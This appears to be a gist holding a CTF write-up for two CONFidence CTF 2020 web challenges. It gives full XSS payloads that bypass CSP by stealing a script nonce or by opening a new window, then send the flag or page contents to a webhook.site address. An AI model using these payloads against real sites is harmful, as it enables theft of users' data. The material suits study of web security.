RenwaX23/x69.html Secret

## x69.html
CONFidence CTF 2020 - Yet Another Cat Challenge (First Blood)

Yet Another Cat Challenge for you! Just another boring add/remove/share note app, but with 8 different cats!

http://yacc.zajebistyc.tf

Solution:
POST /note HTTP/1.1
Host: yacc.zajebistyc.tf

content=x&cat_url=slaw';</script><meta+http-equiv=refresh+content=0;url="http://yacc.zajebistyc.tf/note/faf46d24-b45c-4d30-af21-95ef5f4502f7?theme=blackTheme;slaw=document.scripts[0].nonce;document.write(`\u003cscript/src=http://yacc.zajebistyc.tf/flag?var=flag%26%23x20;nonce=${slaw}\u003e\u003c/script\u003e`);setTimeout(function(){location=`https://webhook.site/x?${flag}`},1000);">

1.Using <meta http-equiv=refresh> redirect to another note with XSS payload
2.Steal the nonce using document.scripts[0].nonce
3.Create a new script with the nonce on http://yacc.zajebistyc.tf/flag?var=flag
4.Redirect to our server with the flag variable

---

CONFidence CTF 2020 - Yet Another Yet Another Cat Challenge (Fixed Version)

Yet Another Cat Challenge for you! Just another boring add/remove/share note app, but with 8 different cats!

http://yayacc.zajebistyc.tf

This is a fixed version which we can't steal the nonce after the document load it will self remove itself

Solution:
POST /note HTTP/1.1
Host: yayacc.zajebistyc.tf

content=x&cat_url=slaw';</script><meta+http-equiv=refresh+content=0;url="http://yayacc.zajebistyc.tf/note/bcb39142-d02b-4f37-b69e-85f62866f236?theme=blackTheme;let%26%23x20;x=window.open(`http://yayacc.zajebistyc.tf/flag?var=slaw`,`x`);setTimeout(function(){location=`https://webhook.site/x?jj=${x.document.body.innerHTML}`},1000);">

1.Using <meta http-equiv=refresh> redirect to another note with XSS payload
2.Open a new window pointing to http://yayacc.zajebistyc.tf/flag?var=slaw
3.Read content of the opened window x.document.body.innerHTML
4.Redirect to our server with the document contents

I'm not sure why this worked because usually browsers block opening a new tab without user interaction


@RenwaX23
	CONFidence CTF 2020 - Yet Another Cat Challenge (First Blood)

	Yet Another Cat Challenge for you! Just another boring add/remove/share note app, but with 8 different cats!

	http://yacc.zajebistyc.tf

	Solution:
	POST /note HTTP/1.1
	Host: yacc.zajebistyc.tf

	content=x&cat_url=slaw';</script><meta+http-equiv=refresh+content=0;url="http://yacc.zajebistyc.tf/note/faf46d24-b45c-4d30-af21-95ef5f4502f7?theme=blackTheme;slaw=document.scripts[0].nonce;document.write(`\u003cscript/src=http://yacc.zajebistyc.tf/flag?var=flag%26%23x20;nonce=${slaw}\u003e\u003c/script\u003e`);setTimeout(function(){location=`https://webhook.site/x?${flag}`},1000);">

	1.Using <meta http-equiv=refresh> redirect to another note with XSS payload
	2.Steal the nonce using document.scripts[0].nonce
	3.Create a new script with the nonce on http://yacc.zajebistyc.tf/flag?var=flag
	4.Redirect to our server with the flag variable

	---

	CONFidence CTF 2020 - Yet Another Yet Another Cat Challenge (Fixed Version)

	Yet Another Cat Challenge for you! Just another boring add/remove/share note app, but with 8 different cats!

	http://yayacc.zajebistyc.tf

	This is a fixed version which we can't steal the nonce after the document load it will self remove itself

	Solution:
	POST /note HTTP/1.1
	Host: yayacc.zajebistyc.tf

	content=x&cat_url=slaw';</script><meta+http-equiv=refresh+content=0;url="http://yayacc.zajebistyc.tf/note/bcb39142-d02b-4f37-b69e-85f62866f236?theme=blackTheme;let%26%23x20;x=window.open(`http://yayacc.zajebistyc.tf/flag?var=slaw`,`x`);setTimeout(function(){location=`https://webhook.site/x?jj=${x.document.body.innerHTML}`},1000);">

	1.Using <meta http-equiv=refresh> redirect to another note with XSS payload
	2.Open a new window pointing to http://yayacc.zajebistyc.tf/flag?var=slaw
	3.Read content of the opened window x.document.body.innerHTML
	4.Redirect to our server with the document contents

	I'm not sure why this worked because usually browsers block opening a new tab without user interaction


	@RenwaX23
No results found